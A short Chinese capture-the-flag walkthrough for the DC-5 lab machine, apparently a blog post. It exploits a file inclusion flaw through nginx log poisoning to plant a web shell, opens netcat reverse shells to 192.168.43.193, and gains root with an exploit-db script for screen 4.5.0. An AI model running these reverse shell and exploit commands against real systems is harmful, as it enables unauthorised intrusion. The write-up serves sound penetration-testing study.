入侵靶机DC-5

1.主机扫描

通过已知MAC地址,确定DC-5的ip。

2.端口扫描

确定靶机开放端口

3.访问web界面

提交表单发现时间在变化

直接访问thankyou.php文件

这里可能存在文件包含

4.web目录扫描

footer.php与刚才页面下面显示的时间相对应,所以可能是被包含文件。

5.contact.php处 Bp抓包测试文件包含

文件包含成功

6.利用nginx日志写shell

菜刀连接

nginx日志路径   /var/log/nginx/access.log

连接符连接命令,文件包含调用/bin/bash解释器执行

nc 192.168.43.193 8888 -c /bin/bash

菜刀虚拟终端反弹shell

nc -e /bin/bash 192.168.43.193 6699

nc -lvvp 6699 监听

7.提权

启动交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

find命令搜索带有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

发现特殊文件screen 4.5.0

搜索已知漏洞

 searchsport screen 4.5.0


 

cp /usr/share/exploitdb/exploits/linux/local/41154.sh ~/Desktop/41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41154.sh ~/Desktop/41152.txt

41154.sh这个脚本不能直接执行,所以需要以下步骤

剪切这两段代码到新文件

执行这两个文件

执行

set ff=unix  使windows的代码可以在unix上运行

并将其他剩余代码剪切到dc5.sh

脚本上传tmp目录

运行dc5.sh

chmod +x dc5.sh

./dc5.sh

8.查看flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值